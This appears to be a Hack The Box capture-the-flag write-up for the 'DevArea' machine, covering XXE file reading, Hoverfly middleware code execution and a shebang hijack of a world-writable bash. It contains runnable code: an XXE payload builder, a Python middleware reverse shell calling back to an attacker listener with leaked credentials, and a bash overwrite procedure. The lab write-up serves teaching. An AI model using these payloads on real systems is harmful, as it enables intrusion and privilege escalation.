
🖥️DevArea

Tags: XXE/SSRF, JWT Auth Bypass, Shebang Hijacking

HTB DevArea — Detailed Solution Notes

Platform: Hack The Box | Machine: DevArea | OS: Linux (Ubuntu) | Difficulty: Medium | Vulnerability Types: SSRF, XXE, JWT Bypass, & Binary Hijacking


🗺️ Attack Chain Summary

  1. Reconnaissance: Nmap scan reveals ports 22, 80, 8080 (Employee Service), and 8888 (Hoverfly API).
  2. Initial Foothold (XXE/SSRF): Exploiting an XML parser on port 8080 to read the Hoverfly service configuration file, leaking hardcoded admin credentials.
  3. Lateral Movement (RCE): Using leaked credentials to authenticate to the Hoverfly API, injecting a Python reverse shell as "Middleware," and obtaining a shell as dev_ryan.
  4. Privilege Escalation (Root): Exploiting a world-writable /usr/bin/bash binary. By switching to a dash shell and killing the bash processes that kept the file busy, the binary was overwritten in place with a small shell script, which a sudo misconfiguration then ran as root through the shebang of an allowed script.

🧠 How Does a Hacker Think? — The Microservice Landscape

When you encounter a machine with several web-related ports (80, 8080, 8888), you are looking at a microservice architecture. The core weakness in these environments is usually trust: services trust each other's data formats (XML/JSON) and share credentials through configuration files. If you can exploit the data processor (port 8080), you can usually read the internal configuration of the whole cluster.


1️⃣ Reconnaissance

Network Scanning

The initial Nmap scan shows a narrow but interesting attack surface: 22 (SSH), 80 (HTTP), 8080 (Employee Service) and 8888 (Hoverfly admin API).

Environment Setup

The web server uses name-based virtual hosting, so requests sent to the bare IP do not reach the right site. Map the target IP to the domain in the local hosts file first: echo "10.129.239.201 devarea.htb" | sudo tee -a /etc/hosts


2️⃣ Initial Foothold: The SSRF/XXE Maneuver

Vulnerability Analysis

The service on port 8080 accepts XML input. Testing for XML External Entity (XXE) injection showed that the parser resolves external entities: a SYSTEM entity pointing at a local path is expanded and its contents come back in the response, so the parser can be used as a file reader on the server.

The Maneuver: Reading Service Configurations

While /etc/passwd is the standard proof, a more advanced hacker goes after systemd unit files under /etc/systemd/system/. These files define how a service starts, and their ExecStart= and Environment= lines often carry hardcoded passwords, API keys or auth flags. Reading the Hoverfly unit this way is what leaked the admin credentials used in the next step.
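As an added example (this is not code from the write-up), the Python below builds the XXE payload for an arbitrary path and runs it through Python's own SAX parser in both states: with external general entities resolved, which mirrors the vulnerable service, and with them disabled, which is xml.sax's default since Python 3.7.1 and the fix a developer should apply. The unit file contents, its path and the root element name "employee" are constructed for the demo; the only value taken from the write-up is the admin:O7IJ27MyyXiU credential.

```python
import io
import os
import re
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for the unit file leaked on the box; only the credential
# pair comes from the write-up, everything else is illustrative.
FAKE_UNIT = """[Unit]
Description=Hoverfly simulation service

[Service]
User=dev_ryan
ExecStart=/usr/bin/hoverfly -auth -username admin -password O7IJ27MyyXiU
Restart=always
"""


def build_xxe_payload(path: str, root: str = "employee") -> bytes:
    """Classic XXE: declare an external general entity that points at a local
    file and reference it inside an element the application echoes back."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root} [ <!ENTITY xxe SYSTEM "file://{path}"> ]>\n'
        f"<{root}><name>&xxe;</name></{root}>"
    ).encode()


class _TextCollector(ContentHandler):
    """Gathers character data, i.e. whatever the entity expanded to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_submission(payload: bytes, resolve_external: bool) -> str:
    """Parse untrusted XML. resolve_external=True mirrors the vulnerable
    service; False is the hardened setting (xml.sax's default since 3.7.1)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(payload))
    return "".join(collector.parts)


def find_credentials(unit_text: str):
    """Pull '-username X -password Y' out of an ExecStart= line, if present."""
    m = re.search(r"^ExecStart=.*?-username\s+(\S+).*?-password\s+(\S+)",
                  unit_text, re.MULTILINE)
    return (m.group(1), m.group(2)) if m else None


def run_demo() -> dict:
    """Write the fake unit file, read it through XXE, then show that the same
    payload yields nothing once external entities are disabled."""
    fd, path = tempfile.mkstemp(suffix=".service")
    with os.fdopen(fd, "w") as f:
        f.write(FAKE_UNIT)
    try:
        payload = build_xxe_payload(path)
        leaked = parse_submission(payload, resolve_external=True)
        blocked = parse_submission(payload, resolve_external=False)
    finally:
        os.unlink(path)
    return {"leaked": leaked, "blocked": blocked, "creds": find_credentials(leaked)}


if __name__ == "__main__":
    result = run_demo()
    print("leaked credentials:", result["creds"])
    print("hardened parser returned:", repr(result["blocked"]))
```

The hardened parser does not error out; it silently expands the entity to nothing, which is why an application can look "fixed" from the outside while still accepting DOCTYPE declarations. If you control the parser, reject any DOCTYPE in user input outright rather than relying on the entity feature alone.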


3️⃣ User Access: The Middleware RCE Maneuver

JWT Authentication

With the credentials admin:O7IJ27MyyXiU, we authenticated to the Hoverfly admin API on port 8888 and received a JWT. Sent as a Bearer token, it grants administrative access to every Hoverfly feature, including the one that executes code.

The Maneuver: Middleware Injection

Hoverfly allows developers to register "Middleware": an external script that Hoverfly executes to process every request/response pair passing through the proxy. Because the script runs under the account that owns the Hoverfly process (dev_ryan here), whoever can set the middleware can run arbitrary code as that user.
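The following is an added example of the middleware injection, written for this page rather than taken from the write-up. It uses Hoverfly's admin endpoints as I know them (POST /api/token-auth returning {"token": ...}, and PUT /api/v2/hoverfly/middleware taking {"binary", "script", "remote"}); verify them against the version on the box. The listener address 10.10.14.5:4444 is an assumption. The middleware script keeps Hoverfly's contract, reading the JSON pair from stdin and writing it back to stdout, because a script that prints anything else makes Hoverfly reject it. Hoverfly test-executes new middleware when it is set, so the shell normally arrives on the PUT itself; if it does not on your version, send any request through the proxy to trigger it.

```python
import json
import subprocess
import sys
import urllib.request

HOVERFLY_ADMIN = "http://devarea.htb:8888"   # admin API port from the write-up
LHOST, LPORT = "10.10.14.5", 4444            # assumed attacker listener

# Middleware script Hoverfly will run as its own service user.  It honours the
# middleware contract (read the {"request":..,"response":..} pair on stdin,
# write it back unchanged on stdout) and connects back as a side effect.
MIDDLEWARE_TEMPLATE = r'''
import json, socket, subprocess, sys
pair = json.load(sys.stdin)
try:
    s = socket.create_connection(("LHOST", LPORT), timeout=3)
    subprocess.Popen(["/bin/sh", "-i"], stdin=s, stdout=s, stderr=s)
except OSError:
    pass                       # listener unreachable: still answer Hoverfly
json.dump(pair, sys.stdout)    # anything else on stdout would break the proxy
'''


def make_middleware(lhost: str = LHOST, lport: int = LPORT) -> str:
    """Fill the listener address into the script text that will be uploaded."""
    return MIDDLEWARE_TEMPLATE.replace("LHOST", lhost).replace("LPORT", str(lport))


def token_request(base: str, username: str, password: str) -> urllib.request.Request:
    """POST /api/token-auth -> {"token": "<JWT>"}"""
    body = json.dumps({"username": username, "password": password}).encode()
    return urllib.request.Request(f"{base}/api/token-auth", data=body, method="POST",
                                  headers={"Content-Type": "application/json"})


def middleware_request(base: str, token: str, script: str,
                       binary: str = "python3") -> urllib.request.Request:
    """PUT /api/v2/hoverfly/middleware with the script and the interpreter to run it."""
    body = json.dumps({"binary": binary, "script": script, "remote": ""}).encode()
    return urllib.request.Request(f"{base}/api/v2/hoverfly/middleware", data=body,
                                  method="PUT",
                                  headers={"Content-Type": "application/json",
                                           "Authorization": f"Bearer {token}"})


def run_middleware_locally(script: str, pair: dict) -> dict:
    """Feed the script a pair on stdin exactly as Hoverfly does and parse the reply.
    Lets you check the contract before uploading; with no listener the connect
    fails fast and the pair must still come back intact."""
    done = subprocess.run([sys.executable, "-c", script], input=json.dumps(pair),
                          capture_output=True, text=True, timeout=60, check=True)
    return json.loads(done.stdout)


def deploy(username: str, password: str) -> None:
    """Live sequence against the target: credentials -> JWT -> middleware upload."""
    with urllib.request.urlopen(token_request(HOVERFLY_ADMIN, username, password)) as r:
        token = json.load(r)["token"]
    req = middleware_request(HOVERFLY_ADMIN, token, make_middleware())
    with urllib.request.urlopen(req) as r:
        print(r.status, r.read().decode())


if __name__ == "__main__":
    deploy("admin", "O7IJ27MyyXiU")   # credentials leaked through the XXE step
```

Start the listener (nc -lvnp 4444) before running deploy; the Popen call inherits the socket as the shell's stdin/stdout/stderr, so the session is interactive without any further redirection.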


4️⃣ Privilege Escalation: The Binary Hijacking Maneuver

Identifying the Weakness

A manual audit of the system revealed a massive security hole: /usr/bin/bash was mode 777 (-rwxrwxrwx). Any user can therefore overwrite the contents of the primary system shell. Deleting or renaming it is a different matter: that needs write permission on /usr/bin itself, which is still root-only, so the attack has to rewrite the file in place rather than swap it out.

The "Kill & Dash" Strategy (Overcoming the Lock)

Attempting to overwrite /usr/bin/bash while logged in via bash fails with Text file busy (ETXTBSY): the kernel refuses to open a file for writing while any process is executing it, and our own reverse shell was one of those processes. To bypass this:

  1. Switch Shells: We spawned a new reverse shell using /bin/dash instead of bash, so that our own session no longer had the bash binary mapped as executable text.
  2. Terminate Processes: kill -9 $(pgrep -x bash) stopped every other bash instance we were allowed to signal. Note that kill only reaches processes owned by dev_ryan; a bash process running as another user would keep the file busy, and nothing short of that process exiting would free it.
  3. Overwrite: With no process executing the file, we replaced the 1.4MB binary with a tiny shell script: echo '#!/bin/sh \n cat /root/root.txt > /tmp/root.txt' > /usr/bin/bash. This relies on dash's echo, which interprets \n as a newline and so emits a two-line script; bash's builtin echo would write the backslash sequence literally, leaving a single malformed shebang line that sh cannot run.

The Shebang Hijack

The final step exploited a sudo misconfiguration: dev_ryan could run /opt/syswatch/syswatch.sh as root. The script's shebang resolves to the bash we just replaced (on Ubuntu's merged-/usr layout /bin/bash and /usr/bin/bash are the same file), so sudo makes root execute our script in place of a real shell. The kernel reads the replacement's own #!/bin/sh line, hands it to sh, and the cat copies root.txt into /tmp, where dev_ryan can read it.
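The whole privilege-escalation procedure, replayed in a scratch directory so that nothing on the host is modified. This is an added example, not code from the write-up, and it uses stand-ins: a copy of the sleep binary plays the world-writable /usr/bin/bash (a running sleep keeps it "text busy" just as a running bash would), and a one-line script whose shebang points at that copy plays /opt/syswatch/syswatch.sh. No sudo is involved; the ETXTBSY behaviour and the interpreter swap are what the example shows, and they work identically when root is the one running the script. It assumes a Linux kernel, which enforces ETXTBSY and allows a shebang interpreter to itself be a script.

```python
import errno
import os
import shutil
import subprocess
import tempfile
import time


def demo_text_busy_hijack() -> dict:
    """Replay the /usr/bin/bash hijack against stand-in files in a temp dir.

    Stand-ins (assumptions, not from the write-up): a copy of sleep plays the
    0777 /usr/bin/bash, and a script whose shebang names that copy plays
    /opt/syswatch/syswatch.sh.
    """
    work = tempfile.mkdtemp()
    interp = os.path.join(work, "sleep")        # the world-writable "bash"
    target = os.path.join(work, "syswatch.sh")  # names it in its shebang
    proof = os.path.join(work, "proof")         # stands in for /tmp/root.txt

    shutil.copy(shutil.which("sleep"), interp)
    os.chmod(interp, 0o777)

    # 1. While some process executes the file, open(O_WRONLY) fails with ETXTBSY.
    busy = subprocess.Popen([interp, "30"])
    time.sleep(0.5)                              # let exec() happen before we try
    first_errno = None
    try:
        with open(interp, "wb"):
            pass
    except OSError as exc:
        first_errno = exc.errno

    # 2. The "kill" step: once no process maps the file as text, writing is allowed.
    busy.kill()
    busy.wait()

    # 3. Overwrite the contents in place.  We only have write on the file, not on
    #    its directory, so unlink/rename are not an option; truncating is.
    with open(interp, "w") as f:
        f.write(f"#!/bin/sh\necho hijacked > {proof}\n")

    # 4. The target's shebang still names the same path; the kernel now loads
    #    our script as the interpreter, sees its own #!/bin/sh and runs it via sh.
    with open(target, "w") as f:
        f.write(f"#!{interp}\n")
    os.chmod(target, 0o755)
    subprocess.run([target], check=True)

    with open(proof) as f:
        payload_ran = f.read().strip() == "hijacked"
    shutil.rmtree(work, ignore_errors=True)
    return {"text_busy": first_errno == errno.ETXTBSY, "payload_ran": payload_ran}


if __name__ == "__main__":
    print(demo_text_busy_hijack())   # expected: both flags True on Linux
```

The first write attempt fails only while the sleep is alive, which is exactly the state the write-up hit from inside a bash session; the second succeeds without touching the directory entry, which is why a 777 file inside a root-owned directory is still enough.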


🛠️ Core Maneuvers Breakdown


🔑 General Hacker Mindset Summary